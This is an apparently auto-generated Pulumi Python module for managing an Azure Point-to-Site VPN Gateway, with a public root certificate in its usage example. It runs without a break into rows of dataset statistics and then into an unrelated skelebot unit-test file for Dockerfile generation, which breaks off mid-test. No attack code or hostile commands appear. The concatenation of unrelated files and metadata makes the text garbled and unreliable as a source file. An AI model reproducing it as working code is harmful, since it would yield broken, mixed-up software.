def dns_servers(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of IP Addresses of DNS Servers for the Point-to-Site VPN Gateway.
"""
return pulumi.get(self, "dns_servers")
@dns_servers.setter
def dns_servers(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "dns_servers", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the Point-to-Site VPN Gateway. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the Point-to-Site VPN Gateway.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@pulumi.input_type
class _PointToPointVpnGatewayState:
    """State container for PointToPointVpnGateway lookups; every field is optional."""

    def __init__(__self__, *,
                 connection_configuration: Optional[pulumi.Input['PointToPointVpnGatewayConnectionConfigurationArgs']] = None,
                 dns_servers: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 location: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 resource_group_name: Optional[pulumi.Input[str]] = None,
                 scale_unit: Optional[pulumi.Input[int]] = None,
                 tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 virtual_hub_id: Optional[pulumi.Input[str]] = None,
                 vpn_server_configuration_id: Optional[pulumi.Input[str]] = None):
        """
        Input properties used for looking up and filtering PointToPointVpnGateway resources.
        :param pulumi.Input['PointToPointVpnGatewayConnectionConfigurationArgs'] connection_configuration: A `connection_configuration` block as defined below.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] dns_servers: A list of IP Addresses of DNS Servers for the Point-to-Site VPN Gateway.
        :param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
        :param pulumi.Input[str] name: Specifies the name of the Point-to-Site VPN Gateway. Changing this forces a new resource to be created.
        :param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the Point-to-Site VPN Gateway. Changing this forces a new resource to be created.
        :param pulumi.Input[int] scale_unit: The [Scale Unit](https://docs.microsoft.com/en-us/azure/virtual-wan/virtual-wan-faq#what-is-a-virtual-wan-gateway-scale-unit) for this Point-to-Site VPN Gateway.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the Point-to-Site VPN Gateway.
        :param pulumi.Input[str] virtual_hub_id: The ID of the Virtual Hub where this Point-to-Site VPN Gateway should exist. Changing this forces a new resource to be created.
        :param pulumi.Input[str] vpn_server_configuration_id: The ID of the VPN Server Configuration which this Point-to-Site VPN Gateway should use. Changing this forces a new resource to be created.
        """
        # Unset fields are omitted entirely so they do not participate in the lookup filter.
        if connection_configuration is not None:
            pulumi.set(__self__, "connection_configuration", connection_configuration)
        if dns_servers is not None:
            pulumi.set(__self__, "dns_servers", dns_servers)
        if location is not None:
            pulumi.set(__self__, "location", location)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if resource_group_name is not None:
            pulumi.set(__self__, "resource_group_name", resource_group_name)
        if scale_unit is not None:
            pulumi.set(__self__, "scale_unit", scale_unit)
        if tags is not None:
            pulumi.set(__self__, "tags", tags)
        if virtual_hub_id is not None:
            pulumi.set(__self__, "virtual_hub_id", virtual_hub_id)
        if vpn_server_configuration_id is not None:
            pulumi.set(__self__, "vpn_server_configuration_id", vpn_server_configuration_id)

    @property
    @pulumi.getter(name="connectionConfiguration")
    def connection_configuration(self) -> Optional[pulumi.Input['PointToPointVpnGatewayConnectionConfigurationArgs']]:
        """
        A `connection_configuration` block as defined below.
        """
        return pulumi.get(self, "connection_configuration")

    @connection_configuration.setter
    def connection_configuration(self, value: Optional[pulumi.Input['PointToPointVpnGatewayConnectionConfigurationArgs']]):
        pulumi.set(self, "connection_configuration", value)

    @property
    @pulumi.getter(name="dnsServers")
    def dns_servers(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        A list of IP Addresses of DNS Servers for the Point-to-Site VPN Gateway.
        """
        return pulumi.get(self, "dns_servers")

    @dns_servers.setter
    def dns_servers(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "dns_servers", value)

    @property
    @pulumi.getter
    def location(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "location")

    @location.setter
    def location(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "location", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the name of the Point-to-Site VPN Gateway. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter(name="resourceGroupName")
    def resource_group_name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the resource group in which to create the Point-to-Site VPN Gateway. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "resource_group_name")

    @resource_group_name.setter
    def resource_group_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "resource_group_name", value)

    @property
    @pulumi.getter(name="scaleUnit")
    def scale_unit(self) -> Optional[pulumi.Input[int]]:
        """
        The [Scale Unit](https://docs.microsoft.com/en-us/azure/virtual-wan/virtual-wan-faq#what-is-a-virtual-wan-gateway-scale-unit) for this Point-to-Site VPN Gateway.
        """
        return pulumi.get(self, "scale_unit")

    @scale_unit.setter
    def scale_unit(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "scale_unit", value)

    @property
    @pulumi.getter
    def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """
        A mapping of tags to assign to the Point-to-Site VPN Gateway.
        """
        return pulumi.get(self, "tags")

    @tags.setter
    def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "tags", value)

    @property
    @pulumi.getter(name="virtualHubId")
    def virtual_hub_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the Virtual Hub where this Point-to-Site VPN Gateway should exist. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "virtual_hub_id")

    @virtual_hub_id.setter
    def virtual_hub_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "virtual_hub_id", value)

    @property
    @pulumi.getter(name="vpnServerConfigurationId")
    def vpn_server_configuration_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the VPN Server Configuration which this Point-to-Site VPN Gateway should use. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "vpn_server_configuration_id")

    @vpn_server_configuration_id.setter
    def vpn_server_configuration_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "vpn_server_configuration_id", value)
class PointToPointVpnGateway(pulumi.CustomResource):
    """Manages an Azure Point-to-Site VPN Gateway resource."""

    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 connection_configuration: Optional[pulumi.Input[pulumi.InputType['PointToPointVpnGatewayConnectionConfigurationArgs']]] = None,
                 dns_servers: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 location: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 resource_group_name: Optional[pulumi.Input[str]] = None,
                 scale_unit: Optional[pulumi.Input[int]] = None,
                 tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 virtual_hub_id: Optional[pulumi.Input[str]] = None,
                 vpn_server_configuration_id: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        """
        Manages a Point-to-Site VPN Gateway.

        ## Example Usage

        ```python
        import pulumi
        import pulumi_azure as azure

        example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
        example_virtual_wan = azure.network.VirtualWan("exampleVirtualWan",
            resource_group_name=example_resource_group.name,
            location=example_resource_group.location)
        example_virtual_hub = azure.network.VirtualHub("exampleVirtualHub",
            resource_group_name=example_resource_group.name,
            location=example_resource_group.location,
            virtual_wan_id=example_virtual_wan.id,
            address_prefix="10.0.0.0/23")
        example_vpn_server_configuration = azure.network.VpnServerConfiguration("exampleVpnServerConfiguration",
            resource_group_name=example_resource_group.name,
            location=example_resource_group.location,
            vpn_authentication_types=["Certificate"],
            client_root_certificates=[azure.network.VpnServerConfigurationClientRootCertificateArgs(
                name="DigiCert-Federated-ID-Root-CA",
                public_cert_data=\"\"\"MIIDuzCCAqOgAwIBAgIQCHTZWCM+IlfFIRXIvyKSrjANBgkqhkiG9w0BAQsFADBn
        MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3
        d3cuZGlnaWNlcnQuY29tMSYwJAYDVQQDEx1EaWdpQ2VydCBGZWRlcmF0ZWQgSUQg
        Um9vdCBDQTAeFw0xMzAxMTUxMjAwMDBaFw0zMzAxMTUxMjAwMDBaMGcxCzAJBgNV
        BAYTAlVTMRUwEwYDVQQKEwxEaWdpQ2VydCBJbmMxGTAXBgNVBAsTEHd3dy5kaWdp
        Y2VydC5jb20xJjAkBgNVBAMTHURpZ2lDZXJ0IEZlZGVyYXRlZCBJRCBSb290IENB
        MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAvAEB4pcCqnNNOWE6Ur5j
        QPUH+1y1F9KdHTRSza6k5iDlXq1kGS1qAkuKtw9JsiNRrjltmFnzMZRBbX8Tlfl8
        zAhBmb6dDduDGED01kBsTkgywYPxXVTKec0WxYEEF0oMn4wSYNl0lt2eJAKHXjNf
        GTwiibdP8CUR2ghSM2sUTI8Nt1Omfc4SMHhGhYD64uJMbX98THQ/4LMGuYegou+d
        GTiahfHtjn7AboSEknwAMJHCh5RlYZZ6B1O4QbKJ+34Q0eKgnI3X6Vc9u0zf6DH8
        Dk+4zQDYRRTqTnVO3VT8jzqDlCRuNtq6YvryOWN74/dq8LQhUnXHvFyrsdMaE1X2
        DwIDAQABo2MwYTAPBgNVHRMBAf8EBTADAQH/MA4GA1UdDwEB/wQEAwIBhjAdBgNV
        HQ4EFgQUGRdkFnbGt1EWjKwbUne+5OaZvRYwHwYDVR0jBBgwFoAUGRdkFnbGt1EW
        jKwbUne+5OaZvRYwDQYJKoZIhvcNAQELBQADggEBAHcqsHkrjpESqfuVTRiptJfP
        9JbdtWqRTmOf6uJi2c8YVqI6XlKXsD8C1dUUaaHKLUJzvKiazibVuBwMIT84AyqR
        QELn3e0BtgEymEygMU569b01ZPxoFSnNXc7qDZBDef8WfqAV/sxkTi8L9BkmFYfL
        uGLOhRJOFprPdoDIUBB+tmCl3oDcBy3vnUeOEioz8zAkprcb3GHwHAK+vHmmfgcn
        WsfMLH4JCLa/tRYL+Rw/N3ybCkDp00s0WUZ+AoDywSl0Q/ZEnNY0MsFiw6LyIdbq
        M/s/1JRtO3bDSzD9TazRVzn2oBqzSa8VgIo5C1nOnoAKJTlsClJKvIhnRlaLQqk=
        \"\"\",
            )])
        example_point_to_point_vpn_gateway = azure.network.PointToPointVpnGateway("examplePointToPointVpnGateway",
            location=example_resource_group.location,
            resource_group_name=example_resource_group.name,
            virtual_hub_id=example_virtual_hub.id,
            vpn_server_configuration_id=example_vpn_server_configuration.id,
            scale_unit=1,
            connection_configuration=azure.network.PointToPointVpnGatewayConnectionConfigurationArgs(
                name="example-gateway-config",
                vpn_client_address_pool=azure.network.PointToPointVpnGatewayConnectionConfigurationVpnClientAddressPoolArgs(
                    address_prefixes=["10.0.2.0/24"],
                ),
            ))
        ```

        ## Import

        Point-to-Site VPN Gateway's can be imported using the `resource id`, e.g.

        ```sh
        $ pulumi import azure:network/pointToPointVpnGateway:PointToPointVpnGateway example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.Network/p2svpnGateways/gateway1
        ```

        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[pulumi.InputType['PointToPointVpnGatewayConnectionConfigurationArgs']] connection_configuration: A `connection_configuration` block as defined below.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] dns_servers: A list of IP Addresses of DNS Servers for the Point-to-Site VPN Gateway.
        :param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
        :param pulumi.Input[str] name: Specifies the name of the Point-to-Site VPN Gateway. Changing this forces a new resource to be created.
        :param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the Point-to-Site VPN Gateway. Changing this forces a new resource to be created.
        :param pulumi.Input[int] scale_unit: The [Scale Unit](https://docs.microsoft.com/en-us/azure/virtual-wan/virtual-wan-faq#what-is-a-virtual-wan-gateway-scale-unit) for this Point-to-Site VPN Gateway.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the Point-to-Site VPN Gateway.
        :param pulumi.Input[str] virtual_hub_id: The ID of the Virtual Hub where this Point-to-Site VPN Gateway should exist. Changing this forces a new resource to be created.
        :param pulumi.Input[str] vpn_server_configuration_id: The ID of the VPN Server Configuration which this Point-to-Site VPN Gateway should use. Changing this forces a new resource to be created.
        """
        ...

    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: PointToPointVpnGatewayArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        Manages a Point-to-Site VPN Gateway.

        ## Example Usage

        ```python
        import pulumi
        import pulumi_azure as azure

        example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
        example_virtual_wan = azure.network.VirtualWan("exampleVirtualWan",
            resource_group_name=example_resource_group.name,
            location=example_resource_group.location)
        example_virtual_hub = azure.network.VirtualHub("exampleVirtualHub",
            resource_group_name=example_resource_group.name,
            location=example_resource_group.location,
            virtual_wan_id=example_virtual_wan.id,
            address_prefix="10.0.0.0/23")
        example_vpn_server_configuration = azure.network.VpnServerConfiguration("exampleVpnServerConfiguration",
            resource_group_name=example_resource_group.name,
            location=example_resource_group.location,
            vpn_authentication_types=["Certificate"],
            client_root_certificates=[azure.network.VpnServerConfigurationClientRootCertificateArgs(
                name="DigiCert-Federated-ID-Root-CA",
                public_cert_data=\"\"\"MIIDuzCCAqOgAwIBAgIQCHTZWCM+IlfFIRXIvyKSrjANBgkqhkiG9w0BAQsFADBn
        MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3
        d3cuZGlnaWNlcnQuY29tMSYwJAYDVQQDEx1EaWdpQ2VydCBGZWRlcmF0ZWQgSUQg
        Um9vdCBDQTAeFw0xMzAxMTUxMjAwMDBaFw0zMzAxMTUxMjAwMDBaMGcxCzAJBgNV
        BAYTAlVTMRUwEwYDVQQKEwxEaWdpQ2VydCBJbmMxGTAXBgNVBAsTEHd3dy5kaWdp
        Y2VydC5jb20xJjAkBgNVBAMTHURpZ2lDZXJ0IEZlZGVyYXRlZCBJRCBSb290IENB
        MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAvAEB4pcCqnNNOWE6Ur5j
        QPUH+1y1F9KdHTRSza6k5iDlXq1kGS1qAkuKtw9JsiNRrjltmFnzMZRBbX8Tlfl8
        zAhBmb6dDduDGED01kBsTkgywYPxXVTKec0WxYEEF0oMn4wSYNl0lt2eJAKHXjNf
        GTwiibdP8CUR2ghSM2sUTI8Nt1Omfc4SMHhGhYD64uJMbX98THQ/4LMGuYegou+d
        GTiahfHtjn7AboSEknwAMJHCh5RlYZZ6B1O4QbKJ+34Q0eKgnI3X6Vc9u0zf6DH8
        Dk+4zQDYRRTqTnVO3VT8jzqDlCRuNtq6YvryOWN74/dq8LQhUnXHvFyrsdMaE1X2
        DwIDAQABo2MwYTAPBgNVHRMBAf8EBTADAQH/MA4GA1UdDwEB/wQEAwIBhjAdBgNV
        HQ4EFgQUGRdkFnbGt1EWjKwbUne+5OaZvRYwHwYDVR0jBBgwFoAUGRdkFnbGt1EW
        jKwbUne+5OaZvRYwDQYJKoZIhvcNAQELBQADggEBAHcqsHkrjpESqfuVTRiptJfP
        9JbdtWqRTmOf6uJi2c8YVqI6XlKXsD8C1dUUaaHKLUJzvKiazibVuBwMIT84AyqR
        QELn3e0BtgEymEygMU569b01ZPxoFSnNXc7qDZBDef8WfqAV/sxkTi8L9BkmFYfL
        uGLOhRJOFprPdoDIUBB+tmCl3oDcBy3vnUeOEioz8zAkprcb3GHwHAK+vHmmfgcn
        WsfMLH4JCLa/tRYL+Rw/N3ybCkDp00s0WUZ+AoDywSl0Q/ZEnNY0MsFiw6LyIdbq
        M/s/1JRtO3bDSzD9TazRVzn2oBqzSa8VgIo5C1nOnoAKJTlsClJKvIhnRlaLQqk=
        \"\"\",
            )])
        example_point_to_point_vpn_gateway = azure.network.PointToPointVpnGateway("examplePointToPointVpnGateway",
            location=example_resource_group.location,
            resource_group_name=example_resource_group.name,
            virtual_hub_id=example_virtual_hub.id,
            vpn_server_configuration_id=example_vpn_server_configuration.id,
            scale_unit=1,
            connection_configuration=azure.network.PointToPointVpnGatewayConnectionConfigurationArgs(
                name="example-gateway-config",
                vpn_client_address_pool=azure.network.PointToPointVpnGatewayConnectionConfigurationVpnClientAddressPoolArgs(
                    address_prefixes=["10.0.2.0/24"],
                ),
            ))
        ```

        ## Import

        Point-to-Site VPN Gateway's can be imported using the `resource id`, e.g.

        ```sh
        $ pulumi import azure:network/pointToPointVpnGateway:PointToPointVpnGateway example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.Network/p2svpnGateways/gateway1
        ```

        :param str resource_name: The name of the resource.
        :param PointToPointVpnGatewayArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...

    def __init__(__self__, resource_name: str, *args, **kwargs):
        # Dispatch between the two overloads above: a single Args object vs. keyword args.
        resource_args, opts = _utilities.get_resource_args_opts(PointToPointVpnGatewayArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)

    def _internal_init(__self__,
                       resource_name: str,
                       opts: Optional[pulumi.ResourceOptions] = None,
                       connection_configuration: Optional[pulumi.Input[pulumi.InputType['PointToPointVpnGatewayConnectionConfigurationArgs']]] = None,
                       dns_servers: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                       location: Optional[pulumi.Input[str]] = None,
                       name: Optional[pulumi.Input[str]] = None,
                       resource_group_name: Optional[pulumi.Input[str]] = None,
                       scale_unit: Optional[pulumi.Input[int]] = None,
                       tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                       virtual_hub_id: Optional[pulumi.Input[str]] = None,
                       vpn_server_configuration_id: Optional[pulumi.Input[str]] = None,
                       __props__=None):
        # Shared implementation behind both __init__ overloads.
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            # Creating a new resource: validate required properties (unless adopting by URN).
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = PointToPointVpnGatewayArgs.__new__(PointToPointVpnGatewayArgs)

            if connection_configuration is None and not opts.urn:
                raise TypeError("Missing required property 'connection_configuration'")
            __props__.__dict__["connection_configuration"] = connection_configuration
            __props__.__dict__["dns_servers"] = dns_servers
            __props__.__dict__["location"] = location
            __props__.__dict__["name"] = name
            if resource_group_name is None and not opts.urn:
                raise TypeError("Missing required property 'resource_group_name'")
            __props__.__dict__["resource_group_name"] = resource_group_name
            if scale_unit is None and not opts.urn:
                raise TypeError("Missing required property 'scale_unit'")
            __props__.__dict__["scale_unit"] = scale_unit
            __props__.__dict__["tags"] = tags
            if virtual_hub_id is None and not opts.urn:
                raise TypeError("Missing required property 'virtual_hub_id'")
            __props__.__dict__["virtual_hub_id"] = virtual_hub_id
            if vpn_server_configuration_id is None and not opts.urn:
                raise TypeError("Missing required property 'vpn_server_configuration_id'")
            __props__.__dict__["vpn_server_configuration_id"] = vpn_server_configuration_id
        super(PointToPointVpnGateway, __self__).__init__(
            'azure:network/pointToPointVpnGateway:PointToPointVpnGateway',
            resource_name,
            __props__,
            opts)

    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            connection_configuration: Optional[pulumi.Input[pulumi.InputType['PointToPointVpnGatewayConnectionConfigurationArgs']]] = None,
            dns_servers: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
            location: Optional[pulumi.Input[str]] = None,
            name: Optional[pulumi.Input[str]] = None,
            resource_group_name: Optional[pulumi.Input[str]] = None,
            scale_unit: Optional[pulumi.Input[int]] = None,
            tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
            virtual_hub_id: Optional[pulumi.Input[str]] = None,
            vpn_server_configuration_id: Optional[pulumi.Input[str]] = None) -> 'PointToPointVpnGateway':
        """
        Get an existing PointToPointVpnGateway resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.

        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[pulumi.InputType['PointToPointVpnGatewayConnectionConfigurationArgs']] connection_configuration: A `connection_configuration` block as defined below.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] dns_servers: A list of IP Addresses of DNS Servers for the Point-to-Site VPN Gateway.
        :param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
        :param pulumi.Input[str] name: Specifies the name of the Point-to-Site VPN Gateway. Changing this forces a new resource to be created.
        :param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the Point-to-Site VPN Gateway. Changing this forces a new resource to be created.
        :param pulumi.Input[int] scale_unit: The [Scale Unit](https://docs.microsoft.com/en-us/azure/virtual-wan/virtual-wan-faq#what-is-a-virtual-wan-gateway-scale-unit) for this Point-to-Site VPN Gateway.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the Point-to-Site VPN Gateway.
        :param pulumi.Input[str] virtual_hub_id: The ID of the Virtual Hub where this Point-to-Site VPN Gateway should exist. Changing this forces a new resource to be created.
        :param pulumi.Input[str] vpn_server_configuration_id: The ID of the VPN Server Configuration which this Point-to-Site VPN Gateway should use. Changing this forces a new resource to be created.
        """
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))

        __props__ = _PointToPointVpnGatewayState.__new__(_PointToPointVpnGatewayState)

        __props__.__dict__["connection_configuration"] = connection_configuration
        __props__.__dict__["dns_servers"] = dns_servers
        __props__.__dict__["location"] = location
        __props__.__dict__["name"] = name
        __props__.__dict__["resource_group_name"] = resource_group_name
        __props__.__dict__["scale_unit"] = scale_unit
        __props__.__dict__["tags"] = tags
        __props__.__dict__["virtual_hub_id"] = virtual_hub_id
        __props__.__dict__["vpn_server_configuration_id"] = vpn_server_configuration_id
        return PointToPointVpnGateway(resource_name, opts=opts, __props__=__props__)

    @property
    @pulumi.getter(name="connectionConfiguration")
    def connection_configuration(self) -> pulumi.Output['outputs.PointToPointVpnGatewayConnectionConfiguration']:
        """
        A `connection_configuration` block as defined below.
        """
        return pulumi.get(self, "connection_configuration")

    @property
    @pulumi.getter(name="dnsServers")
    def dns_servers(self) -> pulumi.Output[Optional[Sequence[str]]]:
        """
        A list of IP Addresses of DNS Servers for the Point-to-Site VPN Gateway.
        """
        return pulumi.get(self, "dns_servers")

    @property
    @pulumi.getter
    def location(self) -> pulumi.Output[str]:
        """
        Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "location")

    @property
    @pulumi.getter
    def name(self) -> pulumi.Output[str]:
        """
        Specifies the name of the Point-to-Site VPN Gateway. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "name")

    @property
    @pulumi.getter(name="resourceGroupName")
    def resource_group_name(self) -> pulumi.Output[str]:
        """
        The name of the resource group in which to create the Point-to-Site VPN Gateway. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "resource_group_name")

    @property
    @pulumi.getter(name="scaleUnit")
    def scale_unit(self) -> pulumi.Output[int]:
        """
        The [Scale Unit](https://docs.microsoft.com/en-us/azure/virtual-wan/virtual-wan-faq#what-is-a-virtual-wan-gateway-scale-unit) for this Point-to-Site VPN Gateway.
        """
        return pulumi.get(self, "scale_unit")

    @property
    @pulumi.getter
    def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
        """
        A mapping of tags to assign to the Point-to-Site VPN Gateway.
        """
        return pulumi.get(self, "tags")

    @property
    @pulumi.getter(name="virtualHubId")
    def virtual_hub_id(self) -> pulumi.Output[str]:
        """
        The ID of the Virtual Hub where this Point-to-Site VPN Gateway should exist. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "virtual_hub_id")

    @property
    @pulumi.getter(name="vpnServerConfigurationId")
    def vpn_server_configuration_id(self) -> pulumi.Output[str]:
        """
        The ID of the VPN Server Configuration which this Point-to-Site VPN Gateway should use. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "vpn_server_configuration_id")
| 53.771558
| 218
| 0.698619
| 4,007
| 35,543
| 5.992264
| 0.06863
| 0.067344
| 0.054225
| 0.030903
| 0.908542
| 0.897714
| 0.891675
| 0.875682
| 0.871892
| 0.859148
| 0
| 0.013098
| 0.211659
| 35,543
| 660
| 219
| 53.85303
| 0.843826
| 0.45919
| 0
| 0.710769
| 1
| 0
| 0.139112
| 0.075673
| 0
| 0
| 0
| 0
| 0
| 1
| 0.16
| false
| 0.003077
| 0.021538
| 0
| 0.276923
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
2185436beeb9585edda4cc6749d585f366f2dcd7
| 22,450
|
py
|
Python
|
test/test_systems_generators_dockerfile.py
|
dmyers87/skelebot
|
954552fc5f465eb2a887f5c96a27f11ad423cd71
|
[
"MIT"
] | null | null | null |
test/test_systems_generators_dockerfile.py
|
dmyers87/skelebot
|
954552fc5f465eb2a887f5c96a27f11ad423cd71
|
[
"MIT"
] | null | null | null |
test/test_systems_generators_dockerfile.py
|
dmyers87/skelebot
|
954552fc5f465eb2a887f5c96a27f11ad423cd71
|
[
"MIT"
] | null | null | null |
import os
import unittest
from unittest import mock
import skelebot as sb
# Test plugin that says 'Duuuuuude' at the end of every command
class SayDude(sb.objects.component.Component):
    """Minimal Skelebot component used to exercise command appending in tests."""

    activation = sb.objects.component.Activation.ALWAYS  # component is active regardless of config

    def appendCommand(self, job, native):
        """Return the extra shell command appended after every job's command."""
        return "echo Duuuuuude"
class TestDockerfile(unittest.TestCase):
path = ""  # real repo root path, captured before os.getcwd is mocked in the tests

# Get the path to the current working directory before we mock the function to do so
def setUp(self):
    """Capture the real working directory and disable unittest diff truncation."""
    self.path = os.getcwd()
    self.maxDiff = None
@mock.patch('os.path.expanduser')
@mock.patch('os.getcwd')
def test_buildDockerfile_no_language(self, mock_getcwd, mock_expanduser):
    """With no language configured, the Dockerfile uses the plain ubuntu base image
    and installs no language dependencies."""
    folderPath = "{path}/test/files".format(path=self.path)
    filePath = "{folder}/Dockerfile".format(folder=folderPath)
    # Point the plugin dir and cwd at test fixtures before loading config.
    mock_expanduser.return_value = "{path}/test/plugins".format(path=self.path)
    mock_getcwd.return_value = folderPath
    config = sb.systems.generators.yaml.loadConfig()
    config.language = None
    expectedDockerfile = """
# This Dockerfile was generated by Skelebot
# Editing this file manually is not advised as all changes will be overwritten by Skelebot
FROM ubuntu:18.04
MAINTAINER Mega Man <megaman@cars.com>
WORKDIR /app
COPY . /app
RUN rm -rf build/
RUN rm -rf dist/
CMD /bin/bash -c \"bash build.sh --env local --log info\"\n"""

    sb.systems.generators.dockerfile.buildDockerfile(config)

    data = None
    with open(filePath, "r") as file:
        data = file.read()

    # assertIsNotNone gives a clearer failure message than assertTrue(x is not None)
    self.assertIsNotNone(data)
    self.assertEqual(data, expectedDockerfile)
@mock.patch('os.path.expanduser')
@mock.patch('os.getcwd')
def test_buildDockerfile_base(self, mock_getcwd, mock_expanduser):
    """R projects get the skelebot/r-base image plus install lines for each
    dependency flavor: plain, github:, file:, and pinned-version packages."""
    folderPath = "{path}/test/files".format(path=self.path)
    filePath = "{folder}/Dockerfile".format(folder=folderPath)
    # Point the plugin dir and cwd at test fixtures before loading config.
    mock_expanduser.return_value = "{path}/test/plugins".format(path=self.path)
    mock_getcwd.return_value = folderPath
    config = sb.systems.generators.yaml.loadConfig()
    config.language = "R"
    config.dependencies.append("github:github.com/repo:cool-lib")
    config.dependencies.append("file:libs/proj:cool-proj")
    config.dependencies.append("dtable=9.0")
